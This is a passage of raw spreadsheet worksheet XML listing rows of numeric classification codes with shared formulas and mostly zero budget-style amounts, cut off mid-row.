      <c r="AP854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="855" ht="18" customHeight="1" spans="1:42">
      <c r="A855" s="10"/>
      <c r="B855" s="10"/>
      <c r="C855" s="28"/>
      <c r="D855" s="10">
        <v>2130105</v>
      </c>
      <c r="E855" s="16" t="s">
        <v>3641</v>
      </c>
      <c r="F855" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G855" s="17"/>
      <c r="H855" s="17"/>
      <c r="I855" s="17"/>
      <c r="J855" s="17"/>
      <c r="K855" s="17"/>
      <c r="L855" s="17"/>
      <c r="M855" s="17"/>
      <c r="N855" s="17"/>
      <c r="O855" s="17"/>
      <c r="P855" s="17"/>
      <c r="Q855" s="17"/>
      <c r="R855" s="17"/>
      <c r="S855" s="17"/>
      <c r="T855" s="17"/>
      <c r="U855" s="17"/>
      <c r="V855" s="17"/>
      <c r="W855" s="17"/>
      <c r="X855" s="17"/>
      <c r="Y855" s="17"/>
      <c r="Z855" s="17"/>
      <c r="AA855" s="17"/>
      <c r="AB855" s="17"/>
      <c r="AC855" s="17"/>
      <c r="AD855" s="17"/>
      <c r="AE855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP855" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="856" ht="18" customHeight="1" spans="1:42">
      <c r="A856" s="10"/>
      <c r="B856" s="10"/>
      <c r="C856" s="28"/>
      <c r="D856" s="10">
        <v>2130106</v>
      </c>
      <c r="E856" s="16" t="s">
        <v>3642</v>
      </c>
      <c r="F856" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G856" s="17"/>
      <c r="H856" s="17"/>
      <c r="I856" s="17"/>
      <c r="J856" s="17"/>
      <c r="K856" s="17"/>
      <c r="L856" s="17"/>
      <c r="M856" s="17"/>
      <c r="N856" s="17"/>
      <c r="O856" s="17"/>
      <c r="P856" s="17"/>
      <c r="Q856" s="17"/>
      <c r="R856" s="17"/>
      <c r="S856" s="17"/>
      <c r="T856" s="17"/>
      <c r="U856" s="17"/>
      <c r="V856" s="17"/>
      <c r="W856" s="17"/>
      <c r="X856" s="17"/>
      <c r="Y856" s="17"/>
      <c r="Z856" s="17"/>
      <c r="AA856" s="17"/>
      <c r="AB856" s="17"/>
      <c r="AC856" s="17"/>
      <c r="AD856" s="17"/>
      <c r="AE856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP856" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="857" ht="18" customHeight="1" spans="1:42">
      <c r="A857" s="10"/>
      <c r="B857" s="10"/>
      <c r="C857" s="28"/>
      <c r="D857" s="10">
        <v>2130108</v>
      </c>
      <c r="E857" s="16" t="s">
        <v>3643</v>
      </c>
      <c r="F857" s="14">
        <f t="shared" si="419"/>
        <v>8</v>
      </c>
      <c r="G857" s="17">
        <v>3</v>
      </c>
      <c r="H857" s="17"/>
      <c r="I857" s="17"/>
      <c r="J857" s="17"/>
      <c r="K857" s="17"/>
      <c r="L857" s="17">
        <v>8</v>
      </c>
      <c r="M857" s="17"/>
      <c r="N857" s="17"/>
      <c r="O857" s="17"/>
      <c r="P857" s="17"/>
      <c r="Q857" s="17"/>
      <c r="R857" s="17"/>
      <c r="S857" s="17">
        <v>3</v>
      </c>
      <c r="T857" s="17"/>
      <c r="U857" s="17"/>
      <c r="V857" s="17"/>
      <c r="W857" s="17"/>
      <c r="X857" s="17">
        <v>6</v>
      </c>
      <c r="Y857" s="17"/>
      <c r="Z857" s="17"/>
      <c r="AA857" s="17"/>
      <c r="AB857" s="17"/>
      <c r="AC857" s="17"/>
      <c r="AD857" s="17"/>
      <c r="AE857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ857" s="17">
        <f t="shared" si="439"/>
        <v>2</v>
      </c>
      <c r="AK857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP857" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="858" ht="18" customHeight="1" spans="1:42">
      <c r="A858" s="10"/>
      <c r="B858" s="10"/>
      <c r="C858" s="28"/>
      <c r="D858" s="10">
        <v>2130109</v>
      </c>
      <c r="E858" s="16" t="s">
        <v>3644</v>
      </c>
      <c r="F858" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G858" s="17"/>
      <c r="H858" s="17"/>
      <c r="I858" s="17"/>
      <c r="J858" s="17"/>
      <c r="K858" s="17"/>
      <c r="L858" s="17"/>
      <c r="M858" s="17"/>
      <c r="N858" s="17"/>
      <c r="O858" s="17"/>
      <c r="P858" s="17"/>
      <c r="Q858" s="17"/>
      <c r="R858" s="17"/>
      <c r="S858" s="17"/>
      <c r="T858" s="17"/>
      <c r="U858" s="17"/>
      <c r="V858" s="17"/>
      <c r="W858" s="17"/>
      <c r="X858" s="17"/>
      <c r="Y858" s="17"/>
      <c r="Z858" s="17"/>
      <c r="AA858" s="17"/>
      <c r="AB858" s="17"/>
      <c r="AC858" s="17"/>
      <c r="AD858" s="17"/>
      <c r="AE858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP858" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="859" ht="18" customHeight="1" spans="1:42">
      <c r="A859" s="10"/>
      <c r="B859" s="10"/>
      <c r="C859" s="28"/>
      <c r="D859" s="10">
        <v>2130110</v>
      </c>
      <c r="E859" s="16" t="s">
        <v>3645</v>
      </c>
      <c r="F859" s="14">
        <f t="shared" si="419"/>
        <v>5</v>
      </c>
      <c r="G859" s="17"/>
      <c r="H859" s="17"/>
      <c r="I859" s="17"/>
      <c r="J859" s="17"/>
      <c r="K859" s="17"/>
      <c r="L859" s="17">
        <v>5</v>
      </c>
      <c r="M859" s="17"/>
      <c r="N859" s="17"/>
      <c r="O859" s="17"/>
      <c r="P859" s="17"/>
      <c r="Q859" s="17"/>
      <c r="R859" s="17"/>
      <c r="S859" s="17"/>
      <c r="T859" s="17"/>
      <c r="U859" s="17"/>
      <c r="V859" s="17"/>
      <c r="W859" s="17"/>
      <c r="X859" s="17">
        <v>5</v>
      </c>
      <c r="Y859" s="17"/>
      <c r="Z859" s="17"/>
      <c r="AA859" s="17"/>
      <c r="AB859" s="17"/>
      <c r="AC859" s="17"/>
      <c r="AD859" s="17"/>
      <c r="AE859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP859" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="860" ht="18" customHeight="1" spans="1:42">
      <c r="A860" s="10"/>
      <c r="B860" s="10"/>
      <c r="C860" s="28"/>
      <c r="D860" s="10">
        <v>2130111</v>
      </c>
      <c r="E860" s="16" t="s">
        <v>3646</v>
      </c>
      <c r="F860" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G860" s="17"/>
      <c r="H860" s="17"/>
      <c r="I860" s="17"/>
      <c r="J860" s="17"/>
      <c r="K860" s="17"/>
      <c r="L860" s="17"/>
      <c r="M860" s="17"/>
      <c r="N860" s="17"/>
      <c r="O860" s="17"/>
      <c r="P860" s="17"/>
      <c r="Q860" s="17"/>
      <c r="R860" s="17"/>
      <c r="S860" s="17"/>
      <c r="T860" s="17"/>
      <c r="U860" s="17"/>
      <c r="V860" s="17"/>
      <c r="W860" s="17"/>
      <c r="X860" s="17"/>
      <c r="Y860" s="17"/>
      <c r="Z860" s="17"/>
      <c r="AA860" s="17"/>
      <c r="AB860" s="17"/>
      <c r="AC860" s="17"/>
      <c r="AD860" s="17"/>
      <c r="AE860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP860" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="861" ht="18" customHeight="1" spans="1:42">
      <c r="A861" s="10"/>
      <c r="B861" s="10"/>
      <c r="C861" s="28"/>
      <c r="D861" s="10">
        <v>2130112</v>
      </c>
      <c r="E861" s="16" t="s">
        <v>3647</v>
      </c>
      <c r="F861" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G861" s="17"/>
      <c r="H861" s="17"/>
      <c r="I861" s="17"/>
      <c r="J861" s="17"/>
      <c r="K861" s="17"/>
      <c r="L861" s="17"/>
      <c r="M861" s="17"/>
      <c r="N861" s="17"/>
      <c r="O861" s="17"/>
      <c r="P861" s="17"/>
      <c r="Q861" s="17"/>
      <c r="R861" s="17"/>
      <c r="S861" s="17"/>
      <c r="T861" s="17"/>
      <c r="U861" s="17"/>
      <c r="V861" s="17"/>
      <c r="W861" s="17"/>
      <c r="X861" s="17"/>
      <c r="Y861" s="17"/>
      <c r="Z861" s="17"/>
      <c r="AA861" s="17"/>
      <c r="AB861" s="17"/>
      <c r="AC861" s="17"/>
      <c r="AD861" s="17"/>
      <c r="AE861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP861" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="862" ht="18" customHeight="1" spans="1:42">
      <c r="A862" s="10"/>
      <c r="B862" s="10"/>
      <c r="C862" s="28"/>
      <c r="D862" s="10">
        <v>2130114</v>
      </c>
      <c r="E862" s="16" t="s">
        <v>3648</v>
      </c>
      <c r="F862" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G862" s="17"/>
      <c r="H862" s="17"/>
      <c r="I862" s="17"/>
      <c r="J862" s="17"/>
      <c r="K862" s="17"/>
      <c r="L862" s="17"/>
      <c r="M862" s="17"/>
      <c r="N862" s="17"/>
      <c r="O862" s="17"/>
      <c r="P862" s="17"/>
      <c r="Q862" s="17"/>
      <c r="R862" s="17"/>
      <c r="S862" s="17"/>
      <c r="T862" s="17"/>
      <c r="U862" s="17"/>
      <c r="V862" s="17"/>
      <c r="W862" s="17"/>
      <c r="X862" s="17"/>
      <c r="Y862" s="17"/>
      <c r="Z862" s="17"/>
      <c r="AA862" s="17"/>
      <c r="AB862" s="17"/>
      <c r="AC862" s="17"/>
      <c r="AD862" s="17"/>
      <c r="AE862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP862" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="863" ht="18" customHeight="1" spans="1:42">
      <c r="A863" s="10"/>
      <c r="B863" s="10"/>
      <c r="C863" s="28"/>
      <c r="D863" s="10">
        <v>2130119</v>
      </c>
      <c r="E863" s="16" t="s">
        <v>3649</v>
      </c>
      <c r="F863" s="14">
        <f t="shared" si="419"/>
        <v>11</v>
      </c>
      <c r="G863" s="17"/>
      <c r="H863" s="17"/>
      <c r="I863" s="17"/>
      <c r="J863" s="17"/>
      <c r="K863" s="17"/>
      <c r="L863" s="17"/>
      <c r="M863" s="17">
        <v>11</v>
      </c>
      <c r="N863" s="17"/>
      <c r="O863" s="17"/>
      <c r="P863" s="17"/>
      <c r="Q863" s="17"/>
      <c r="R863" s="17"/>
      <c r="S863" s="17"/>
      <c r="T863" s="17"/>
      <c r="U863" s="17"/>
      <c r="V863" s="17"/>
      <c r="W863" s="17"/>
      <c r="X863" s="17"/>
      <c r="Y863" s="17">
        <v>11</v>
      </c>
      <c r="Z863" s="17"/>
      <c r="AA863" s="17"/>
      <c r="AB863" s="17"/>
      <c r="AC863" s="17"/>
      <c r="AD863" s="17"/>
      <c r="AE863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP863" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="864" ht="18" customHeight="1" spans="1:42">
      <c r="A864" s="10"/>
      <c r="B864" s="10"/>
      <c r="C864" s="28"/>
      <c r="D864" s="10">
        <v>2130120</v>
      </c>
      <c r="E864" s="16" t="s">
        <v>3650</v>
      </c>
      <c r="F864" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G864" s="17"/>
      <c r="H864" s="17"/>
      <c r="I864" s="17"/>
      <c r="J864" s="17"/>
      <c r="K864" s="17"/>
      <c r="L864" s="17"/>
      <c r="M864" s="17"/>
      <c r="N864" s="17"/>
      <c r="O864" s="17"/>
      <c r="P864" s="17"/>
      <c r="Q864" s="17"/>
      <c r="R864" s="17"/>
      <c r="S864" s="17"/>
      <c r="T864" s="17"/>
      <c r="U864" s="17"/>
      <c r="V864" s="17"/>
      <c r="W864" s="17"/>
      <c r="X864" s="17"/>
      <c r="Y864" s="17"/>
      <c r="Z864" s="17"/>
      <c r="AA864" s="17"/>
      <c r="AB864" s="17"/>
      <c r="AC864" s="17"/>
      <c r="AD864" s="17"/>
      <c r="AE864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP864" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="865" ht="18" customHeight="1" spans="1:42">
      <c r="A865" s="10"/>
      <c r="B865" s="10"/>
      <c r="C865" s="28"/>
      <c r="D865" s="10">
        <v>2130121</v>
      </c>
      <c r="E865" s="16" t="s">
        <v>3651</v>
      </c>
      <c r="F865" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G865" s="17"/>
      <c r="H865" s="17"/>
      <c r="I865" s="17"/>
      <c r="J865" s="17"/>
      <c r="K865" s="17"/>
      <c r="L865" s="17"/>
      <c r="M865" s="17"/>
      <c r="N865" s="17"/>
      <c r="O865" s="17"/>
      <c r="P865" s="17"/>
      <c r="Q865" s="17"/>
      <c r="R865" s="17"/>
      <c r="S865" s="17"/>
      <c r="T865" s="17"/>
      <c r="U865" s="17"/>
      <c r="V865" s="17"/>
      <c r="W865" s="17"/>
      <c r="X865" s="17"/>
      <c r="Y865" s="17"/>
      <c r="Z865" s="17"/>
      <c r="AA865" s="17"/>
      <c r="AB865" s="17"/>
      <c r="AC865" s="17"/>
      <c r="AD865" s="17"/>
      <c r="AE865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP865" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="866" ht="18" customHeight="1" spans="1:42">
      <c r="A866" s="10"/>
      <c r="B866" s="10"/>
      <c r="C866" s="28"/>
      <c r="D866" s="10">
        <v>2130122</v>
      </c>
      <c r="E866" s="16" t="s">
        <v>3652</v>
      </c>
      <c r="F866" s="14">
        <f t="shared" si="419"/>
        <v>520</v>
      </c>
      <c r="G866" s="17"/>
      <c r="H866" s="17"/>
      <c r="I866" s="17"/>
      <c r="J866" s="17"/>
      <c r="K866" s="17"/>
      <c r="L866" s="17"/>
      <c r="M866" s="17">
        <v>520</v>
      </c>
      <c r="N866" s="17"/>
      <c r="O866" s="17"/>
      <c r="P866" s="17"/>
      <c r="Q866" s="17"/>
      <c r="R866" s="17"/>
      <c r="S866" s="17"/>
      <c r="T866" s="17"/>
      <c r="U866" s="17"/>
      <c r="V866" s="17"/>
      <c r="W866" s="17"/>
      <c r="X866" s="17"/>
      <c r="Y866" s="17">
        <v>455</v>
      </c>
      <c r="Z866" s="17"/>
      <c r="AA866" s="17"/>
      <c r="AB866" s="17"/>
      <c r="AC866" s="17"/>
      <c r="AD866" s="17"/>
      <c r="AE866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK866" s="17">
        <f t="shared" si="439"/>
        <v>65</v>
      </c>
      <c r="AL866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP866" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="867" ht="18" customHeight="1" spans="1:42">
      <c r="A867" s="10"/>
      <c r="B867" s="10"/>
      <c r="C867" s="28"/>
      <c r="D867" s="10">
        <v>2130124</v>
      </c>
      <c r="E867" s="16" t="s">
        <v>3653</v>
      </c>
      <c r="F867" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G867" s="17"/>
      <c r="H867" s="17"/>
      <c r="I867" s="17"/>
      <c r="J867" s="17"/>
      <c r="K867" s="17"/>
      <c r="L867" s="17"/>
      <c r="M867" s="17"/>
      <c r="N867" s="17"/>
      <c r="O867" s="17"/>
      <c r="P867" s="17"/>
      <c r="Q867" s="17"/>
      <c r="R867" s="17"/>
      <c r="S867" s="17"/>
      <c r="T867" s="17"/>
      <c r="U867" s="17"/>
      <c r="V867" s="17"/>
      <c r="W867" s="17"/>
      <c r="X867" s="17"/>
      <c r="Y867" s="17"/>
      <c r="Z867" s="17"/>
      <c r="AA867" s="17"/>
      <c r="AB867" s="17"/>
      <c r="AC867" s="17"/>
      <c r="AD867" s="17"/>
      <c r="AE867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP867" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="868" ht="18" customHeight="1" spans="1:42">
      <c r="A868" s="10"/>
      <c r="B868" s="10"/>
      <c r="C868" s="28"/>
      <c r="D868" s="10">
        <v>2130125</v>
      </c>
      <c r="E868" s="16" t="s">
        <v>3654</v>
      </c>
      <c r="F868" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G868" s="17"/>
      <c r="H868" s="17"/>
      <c r="I868" s="17"/>
      <c r="J868" s="17"/>
      <c r="K868" s="17"/>
      <c r="L868" s="17"/>
      <c r="M868" s="17"/>
      <c r="N868" s="17"/>
      <c r="O868" s="17"/>
      <c r="P868" s="17"/>
      <c r="Q868" s="17"/>
      <c r="R868" s="17"/>
      <c r="S868" s="17"/>
      <c r="T868" s="17"/>
      <c r="U868" s="17"/>
      <c r="V868" s="17"/>
      <c r="W868" s="17"/>
      <c r="X868" s="17"/>
      <c r="Y868" s="17"/>
      <c r="Z868" s="17"/>
      <c r="AA868" s="17"/>
      <c r="AB868" s="17"/>
      <c r="AC868" s="17"/>
      <c r="AD868" s="17"/>
      <c r="AE868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO868" s="17">
